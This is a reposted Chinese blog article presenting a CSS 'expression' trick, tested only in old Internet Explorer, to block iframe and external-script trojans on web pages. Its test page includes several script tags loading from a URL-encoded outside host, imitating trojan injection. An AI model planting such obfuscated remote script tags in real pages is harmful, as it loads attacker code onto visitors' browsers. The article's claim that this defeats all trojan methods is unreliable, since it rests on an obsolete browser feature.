二行代码解决全部网页木马(2)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>让JS木马的进程迅速中止的CSS代码</title> 
<style type="text/css" id="LinrStudio"> 
/*<![CDATA[*/ 
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} 
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} 
/* 以后请在此关注最新木马处理方法: */ 
/*]]>*/ 
</style> 
</head> 
<body> 
<script type="text/javascript" src="1.js"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script> 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的1 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的2 
<script src=http://%76%63%63%64%2E%63%6E></script> 
我是页面本身的3 
<script src=http://%76%63%63%64%2E%63%6E></script> 
</body> 
</html>  

其中1.js是自己本站的:

document.write("我是本站的JS文件");
document.write("<img src='http://www.baidu.com/images/logo.gif' />");
我的测试环境是:

Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。

综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wjgwfp.html